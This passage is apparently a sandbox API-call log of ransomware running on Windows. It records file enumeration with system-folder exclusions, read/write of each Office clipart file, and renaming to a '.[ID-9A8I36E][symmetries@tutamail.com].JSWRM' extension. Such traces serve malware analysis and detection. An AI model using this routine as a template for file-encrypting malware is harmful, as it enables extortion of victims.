(in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00453_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0075.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00453_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0075.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.686] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2436) returned 1 [0075.686] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x980) returned 0x23fc98 [0075.686] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x980, lpOverlapped=0x0) returned 1 [0075.688] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.688] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x980, lpOverlapped=0x0) returned 1 [0075.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.688] CloseHandle (hObject=0x460) returned 1 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0075.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0075.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0075.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0075.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0075.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.689] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01080_.WMF", cAlternateFileName="")) returned 1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2=".") returned 1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="..") returned 1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="...") returned 1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="windows") returned -1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="recovery") returned -1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="perflogs") returned -1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="documents and settings") returned -1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="system volume information") returned -1 [0075.689] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="msocache") returned -1 [0075.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01080_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01080_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01080_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01080_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01080_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01080_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.690] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2732) returned 1 [0075.690] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaa0) returned 0x23fc98 [0075.690] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xaa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xaa0, lpOverlapped=0x0) returned 1 [0075.692] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.692] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xaa0, lpOverlapped=0x0) returned 1 [0075.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.692] CloseHandle (hObject=0x460) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0075.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0075.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0075.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0075.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.692] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0075.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.693] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01603_.WMF", cAlternateFileName="")) returned 1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2=".") returned 1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="..") returned 1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="...") returned 1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="windows") returned -1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="recovery") returned -1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="perflogs") returned -1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="documents and settings") returned -1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="system volume information") returned -1 [0075.693] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="msocache") returned -1 [0075.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0075.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01603_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01603_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01603_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0075.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0075.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01603_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01603_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01603_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0075.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.694] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7176) returned 1 [0075.694] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c00) returned 0x24c1d0 [0075.695] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1c00, lpOverlapped=0x0) returned 1 [0075.696] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.696] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1c00, lpOverlapped=0x0) returned 1 [0075.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.697] CloseHandle (hObject=0x460) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0075.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0075.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0075.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0075.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.697] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.698] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01634_.WMF", cAlternateFileName="")) returned 1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2=".") returned 1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="..") returned 1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="...") returned 1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="windows") returned -1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="recovery") returned -1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="perflogs") returned -1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="documents and settings") returned -1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="system volume information") returned -1 [0075.698] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="msocache") returned -1 [0075.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01634_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01634_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01634_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01634_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01634_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01634_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, 